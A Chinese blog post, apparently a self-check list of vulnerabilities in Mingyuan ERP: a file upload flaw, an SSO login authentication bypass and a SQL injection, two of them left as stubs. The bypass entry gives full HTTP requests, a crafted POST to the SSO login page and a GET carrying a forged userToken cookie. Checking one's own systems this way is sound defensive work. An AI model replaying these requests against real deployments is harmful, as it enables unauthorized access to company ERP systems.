明源相关漏洞自查清单(2025)

  1. 明源云 ERP 文档服务系统任意文件上传

    1. 漏洞类型:文件上传
    2. 漏洞路径:待确认
    3. 验证方式:待确认

  2. 明源ERP sso/login.aspx身份认证绕过

    1. 漏洞类型:越权
    2. 漏洞路径:/PubPlatform/nav/login/sso/login.aspx
    3. 验证方式: 
      POST /PubPlatform/nav/login/sso/login.aspx HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded

__yzsAppSecret=test&user_info=%66%79%6d%71%35%62%49%63%78%58%5a%49%78%75%36%4b%6c%6c%73%46%49%52%32%5a%77%45%4a%4b%2b%56%45%39%35%44%6b%78%2f%43%6e%46%67%46%51%3d



GET /PubPlatform/nav/home/default?_nav=0000 HTTP/1.1
Cookie: userToken=674368A4EC31B7DF719C2CB32325206859FB63D329E30D59CC3A53EBDEF8A6D4AA0370A2A4143A3AB19A87D4BFA025252EAB17A695CE7006559242EBE643C0C7B4F430890D661F14A9B51EB9C3AE1384BF7CCD020C7AC0BD8C7EA2A82E76BFA790F391FC4CA2D628D4920D5F75E02DA2A2A19512449376AE159F8003001B2295;

        

  3. 明源地产 ERP DataRuleXMLHTTP.aspx SQL 注入

    1. 漏洞类型:SQL注入
    2. 漏洞路径:DataRuleXMLHTTP.aspx
    3. 验证方式:待确认
posted @ 2025-07-27 11:02  r1ch4rd_L  阅读(534)  评论(0)    收藏  举报